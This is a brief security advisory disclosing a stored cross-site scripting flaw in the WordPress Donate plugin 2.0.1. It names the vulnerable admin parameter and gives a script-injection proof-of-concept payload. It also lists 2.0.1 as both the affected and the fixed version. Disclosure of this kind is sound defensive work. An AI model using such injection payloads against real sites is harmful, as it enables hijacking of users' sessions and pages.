WordPress Donate 2.0.1 Cross Site Scripting

`Plugin Name : Donate  
  
Effected Version : 2.0.1 (and most probably lower version's if any)  
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Administrator  
  
PoC - (Proof of Concept) :  
  
The following field put the payload as below  
  
http://localhost/wp-admin/admin.php?page=donate.php  
  
dnt_paypal_purpose = ‘><script>alert(2)</script>  
  
Vulnerable Parameter : dnt_paypal_purpose  
  
Type of XSS : Stored  
  
Fixed in : 2.0.1  
  
http://wordpress.org/plugins/donate-button/changelog/  
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-04  
  
Plugin Status : Updated on 2014-08-07  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
Donate plugin helps to get donations from payment systems, like PayPal or 2CheckOut. It has a user-friendly and simple interface which allows to place the donate button anywhere on the site.  
`